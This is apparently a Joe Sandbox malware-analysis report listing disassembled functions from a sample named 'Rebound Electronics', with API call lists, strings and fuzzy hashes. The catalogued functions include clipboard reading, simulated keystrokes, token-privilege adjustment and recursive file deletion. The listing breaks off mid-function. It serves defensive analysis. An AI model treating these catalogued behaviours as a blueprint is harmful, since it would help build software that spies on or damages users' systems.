Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: d9d8bf2c874c0fde387d5f4bc1ccafde636a681f260a8036d749a4c157bb406a
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: C9013131500119EFCF09EFA5D8928FEBB74AF20344F108069F566975A5EA309B49EB60

Function 00C42AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00C42AED

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: a80b6e47c2d0d36695f0e643b1fff94aa00a5d1fba8d9fa4e9e767ec99af956d
Instruction ID: da032720d2f9309e02c231d11353b33331edcb4ba6ffa5daa74b97a5e6d00a6b
Opcode Fuzzy Hash: a80b6e47c2d0d36695f0e643b1fff94aa00a5d1fba8d9fa4e9e767ec99af956d
Instruction Fuzzy Hash: 66F09031940205EBDF21AFB58C077DF3AA5BF01320F558515F8249B191D7788A52FB52

Function 00C24252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00C239FE,?,00000001), ref: 00C24286

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: dcf89dea5bf209e180f044c61e3fc0985b412d62f8199f05eff6d3b2243b0efb
Instruction ID: 077d58cf57a5fd1f0ba68f86586b4bcc150d44ec864ece3945470e240792e977
Opcode Fuzzy Hash: dcf89dea5bf209e180f044c61e3fc0985b412d62f8199f05eff6d3b2243b0efb
Instruction Fuzzy Hash: 13F03071505721CFCB389F66E494856B7E4FF043253248A3EF1D782911C7719940DF50

Function 00C240A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C240C6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 7cbeae9d4b6ca024eafed51ae1a08e0fff2ccc61d963c05e0fedcc7c213f60d0
Instruction ID: 1b6ba9971353adfcb74611cbf383a02bf7edd3d942b30bcf786d3a553c3cde22
Opcode Fuzzy Hash: 7cbeae9d4b6ca024eafed51ae1a08e0fff2ccc61d963c05e0fedcc7c213f60d0
Instruction Fuzzy Hash: D5E0CD365002245BC7119654DC46FEE779DDF8D6A4F050075F905D7244DA6499819690

Function 00C6BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C6BD16

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: eb3f658195e4d87fca13028163224eb9f848ca615bcd007cbe717c231f1beb5e
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: 0AE092B0104B409BDB348A24D840BE373E0EB05305F00081DF2AAC7245EB627C818659

Function 018CBFB0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 018CBFC1

Memory Dump Source

Source File: 00000000.00000002.1692975510.00000000018C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 018C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c9000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 4e658cb3c6b6b9a3e6b2ebd4ca61f9a6777f07415eeecb41d7956d385e042507
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 2BE0E67494410EDFDB00EFB4D54969E7FB4EF04701F100165FD01D2281D7319E509A62

Non-executed Functions

Function 00C8F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00C8F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8F8DC
GetWindowLongW.USER32(?,000000F0), ref: 00C8F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C8F940
SendMessageW.USER32 ref: 00C8F966
_wcsncpy.LIBCMT ref: 00C8F9D2
GetKeyState.USER32(00000011), ref: 00C8F9F3
GetKeyState.USER32(00000009), ref: 00C8FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8FA16
GetKeyState.USER32(00000010), ref: 00C8FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C8FA4F
SendMessageW.USER32 ref: 00C8FA72
SendMessageW.USER32(?,00001030,?,00C8E059), ref: 00C8FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00C8FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C8FB96
SetCapture.USER32(?), ref: 00C8FB9F
ClientToScreen.USER32(?,?), ref: 00C8FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C8FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00C8FC29
ReleaseCapture.USER32 ref: 00C8FC34
GetCursorPos.USER32(?), ref: 00C8FC69
ScreenToClient.USER32(?,?), ref: 00C8FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C8FCD8
SendMessageW.USER32 ref: 00C8FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C8FD41
SendMessageW.USER32 ref: 00C8FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C8FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C8FD8F
GetCursorPos.USER32(?), ref: 00C8FDB0
ScreenToClient.USER32(?,?), ref: 00C8FDBD
GetParent.USER32(?), ref: 00C8FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C8FE3F
SendMessageW.USER32 ref: 00C8FE6F
ClientToScreen.USER32(?,?), ref: 00C8FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C8FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C8FF19
SendMessageW.USER32 ref: 00C8FF3C
ClientToScreen.USER32(?,?), ref: 00C8FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C8FFB6
GetWindowLongW.USER32(?,000000F0), ref: 00C9004B

Strings

@GUI_DRAGID, xrefs: 00C8FBCC
F, xrefs: 00C8FF42

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 2f608296e2e45c9158dea5e99cf1aca105f2087807c76334942ff5867d310cbf
Instruction ID: c1f21af882dcb3a96cde6a261427f9af09fd3c5e776f3be9680afabe00c3c0e0
Opcode Fuzzy Hash: 2f608296e2e45c9158dea5e99cf1aca105f2087807c76334942ff5867d310cbf
Instruction Fuzzy Hash: EE32BE70604345EFDB10EF64C884BAABBA8FF4A358F140A2DF666872A1C731DD52CB55

Function 00C8AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C8B1CD

Strings

%d/%02d/%02d, xrefs: 00C8AEFC

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: e39da3add1dfa4736a9909d3c0023f08177db7e16a8a943dd196e3e3e69c10cd
Instruction ID: 0a11dd2b2ea91d5c24a60e4c867749bd86177188c3c8e4ab57bbf3edca2c856d
Opcode Fuzzy Hash: e39da3add1dfa4736a9909d3c0023f08177db7e16a8a943dd196e3e3e69c10cd
Instruction Fuzzy Hash: 3B12FF71500218ABEB24AF65CC49FAE7BB8FF45318F14451AF92ADB2D1DB709A01CB15

Function 00C3EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00C3EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C93AEA
IsIconic.USER32(000000FF), ref: 00C93AF3
ShowWindow.USER32(000000FF,00000009), ref: 00C93B00
SetForegroundWindow.USER32(000000FF), ref: 00C93B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C93B20
GetCurrentThreadId.KERNEL32 ref: 00C93B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00C93B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00C93B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00C93B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00C93B54
SetForegroundWindow.USER32(000000FF), ref: 00C93B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C93B6C
keybd_event.USER32(00000012,00000000), ref: 00C93B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C93B81
keybd_event.USER32(00000012,00000000), ref: 00C93B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C93B8F
keybd_event.USER32(00000012,00000000), ref: 00C93B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C93B9E
keybd_event.USER32(00000012,00000000), ref: 00C93BA3
SetForegroundWindow.USER32(000000FF), ref: 00C93BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00C93BCD

Strings

Shell_TrayWnd, xrefs: 00C93AE5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 718148e3bfde408b15aa3c1457372b67e2a1f6b6ddc19b9095ea4ecafecee759
Instruction ID: 8f2ffd68f73745b213a2470e0c893e8986041299ce4383b20b007df16e1b1a54
Opcode Fuzzy Hash: 718148e3bfde408b15aa3c1457372b67e2a1f6b6ddc19b9095ea4ecafecee759
Instruction Fuzzy Hash: 533166B1A40318BBEF215FA59C49F7F7E6CEB45B54F104016FA06EB1D1DBB15E00AAA0

Function 00C5ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00C5B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5B180
Part of subcall function 00C5B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5B1AD
Part of subcall function 00C5B134: GetLastError.KERNEL32 ref: 00C5B1BA

_memset.LIBCMT ref: 00C5AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C5AD5A
CloseHandle.KERNEL32(?), ref: 00C5AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C5AD82
GetProcessWindowStation.USER32 ref: 00C5AD9B
SetProcessWindowStation.USER32(00000000), ref: 00C5ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C5ADBF

Part of subcall function 00C5AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C5ACC0), ref: 00C5AB99
Part of subcall function 00C5AB84: CloseHandle.KERNEL32(?,?,00C5ACC0), ref: 00C5ABAB

Strings

, xrefs: 00C5AD17
default, xrefs: 00C5ADBA
winsta0, xrefs: 00C5AD7D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 0d35c87ca2fe42a363e8399e6b310d92fac187c406e8e4c8c7aadd239f59989b
Instruction ID: 751bf16621f40a44423b4264bf14f62779ce909e619e108006089652e4bd4b44
Opcode Fuzzy Hash: 0d35c87ca2fe42a363e8399e6b310d92fac187c406e8e4c8c7aadd239f59989b
Instruction Fuzzy Hash: 8581ADB5800209AFDF119FA5CC49AEE7B78FF08305F044219FD26A2161D7718E99DB65

Function 00C660DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C66EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C65FA6,?), ref: 00C66ED8

Part of subcall function 00C66EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C65FA6,?), ref: 00C66EF1

Part of subcall function 00C6725E: __wsplitpath.LIBCMT ref: 00C6727B
Part of subcall function 00C6725E: __wsplitpath.LIBCMT ref: 00C6728E

Part of subcall function 00C672CB: GetFileAttributesW.KERNEL32(?,00C66019), ref: 00C672CC

_wcscat.LIBCMT ref: 00C66149
_wcscat.LIBCMT ref: 00C66167
__wsplitpath.LIBCMT ref: 00C6618E
FindFirstFileW.KERNEL32(?,?), ref: 00C661A4
_wcscpy.LIBCMT ref: 00C66209
_wcscat.LIBCMT ref: 00C6621C
_wcscat.LIBCMT ref: 00C6622F
lstrcmpiW.KERNEL32(?,?), ref: 00C6625D
DeleteFileW.KERNEL32(?), ref: 00C6626E
MoveFileW.KERNEL32(?,?), ref: 00C66289
MoveFileW.KERNEL32(?,?), ref: 00C66298
CopyFileW.KERNEL32(?,?,00000000), ref: 00C662AD
DeleteFileW.KERNEL32(?), ref: 00C662BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C662E1
FindClose.KERNEL32(00000000), ref: 00C662FD
FindClose.KERNEL32(00000000), ref: 00C6630B

Strings

\*.*, xrefs: 00C66138, 00C66147, 00C66165

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 82ef1cc523895991562cbbca105f5fee9bec3cb81127f9128e551dbc27edf47c
Instruction ID: 26af1fc3cfece6f807678142cee65a1af5edd057b64d99dd116c55a4232c85e8
Opcode Fuzzy Hash: 82ef1cc523895991562cbbca105f5fee9bec3cb81127f9128e551dbc27edf47c
Instruction Fuzzy Hash: F451237290811CAACB21EB91CC94EDF77BCAF05304F0501E6E596E3141DE369B89DF95

Function 00C76B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00CBDC00), ref: 00C76B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00C76B44
GetClipboardData.USER32(0000000D), ref: 00C76B4C
CloseClipboard.USER32 ref: 00C76B58
GlobalLock.KERNEL32(00000000), ref: 00C76B74
CloseClipboard.USER32 ref: 00C76B7E
GlobalUnlock.KERNEL32(00000000), ref: 00C76B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00C76BA0
GetClipboardData.USER32(00000001), ref: 00C76BA8
GlobalLock.KERNEL32(00000000), ref: 00C76BB5
GlobalUnlock.KERNEL32(00000000), ref: 00C76BE9
CloseClipboard.USER32 ref: 00C76CF6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 6df4de7606088bf90e1ed8d5bf8750d15d8f0790e953e45cf9e7feab04386cac
Instruction ID: eb3a78d07c5661223ec0b70833e8f56a783d296a941b0a31c6d54e836779bd7a
Opcode Fuzzy Hash: 6df4de7606088bf90e1ed8d5bf8750d15d8f0790e953e45cf9e7feab04386cac
Instruction Fuzzy Hash: FA51BD31244701ABD301EF60DD86FAE77A8AF89B04F008529F59BD75E1DF70D905EA62

Function 00C6F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C6F62B
FindClose.KERNEL32(00000000), ref: 00C6F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C6F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C6F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C6F6E2
__swprintf.LIBCMT ref: 00C6F72E
__swprintf.LIBCMT ref: 00C6F767
__swprintf.LIBCMT ref: 00C6F7BB

Part of subcall function 00C4172B: __woutput_l.LIBCMT ref: 00C41784

__swprintf.LIBCMT ref: 00C6F809
__swprintf.LIBCMT ref: 00C6F858
__swprintf.LIBCMT ref: 00C6F8A7
__swprintf.LIBCMT ref: 00C6F8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C6F728
%02d, xrefs: 00C6F7B0, 00C6F7B9, 00C6F807, 00C6F856, 00C6F8A5, 00C6F8F4
%4d, xrefs: 00C6F761

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 0b8fad038cdd7eb185af1350063a3a3d329e4bf570cad02f88357085a021b9d9
Instruction ID: 47d776f6f64bf55e292b07aa31333b9989783a4c614b4a9efd1b7726ca08118a
Opcode Fuzzy Hash: 0b8fad038cdd7eb185af1350063a3a3d329e4bf570cad02f88357085a021b9d9
Instruction Fuzzy Hash: 2AA130B2408354ABC710EBA4D885EAFB7ECBF98304F44082EF596C3551EB34DA49D762

Function 00C71B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C71B50
_wcscmp.LIBCMT ref: 00C71B65
_wcscmp.LIBCMT ref: 00C71B7C
GetFileAttributesW.KERNEL32(?), ref: 00C71B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00C71BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00C71BC0
FindClose.KERNEL32(00000000), ref: 00C71BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00C71BE7
_wcscmp.LIBCMT ref: 00C71C0E
_wcscmp.LIBCMT ref: 00C71C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00C71C37
SetCurrentDirectoryW.KERNEL32(00CD39FC), ref: 00C71C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C71C5F
FindClose.KERNEL32(00000000), ref: 00C71C6C
FindClose.KERNEL32(00000000), ref: 00C71C7C

Strings

*.*, xrefs: 00C71BE2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 1a5fc496a734321d7eea18fb9ecde33d70e8ee5d9933405fea7a00dc8abb747a
Instruction ID: a259a28a34ec66b40d573c8e9bdec8a0052de43c31405d73ad4df759ea0e20fb
Opcode Fuzzy Hash: 1a5fc496a734321d7eea18fb9ecde33d70e8ee5d9933405fea7a00dc8abb747a
Instruction Fuzzy Hash: C231C8715002196BDF119FF4DC49BDE77ACAF06324F188166ED1AE3190EB70DF858A64

Function 00C71C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C71CAB
_wcscmp.LIBCMT ref: 00C71CC0
_wcscmp.LIBCMT ref: 00C71CD7

Part of subcall function 00C66BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C66BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00C71D06
FindClose.KERNEL32(00000000), ref: 00C71D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00C71D2D
_wcscmp.LIBCMT ref: 00C71D54
_wcscmp.LIBCMT ref: 00C71D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00C71D7D
SetCurrentDirectoryW.KERNEL32(00CD39FC), ref: 00C71D9B
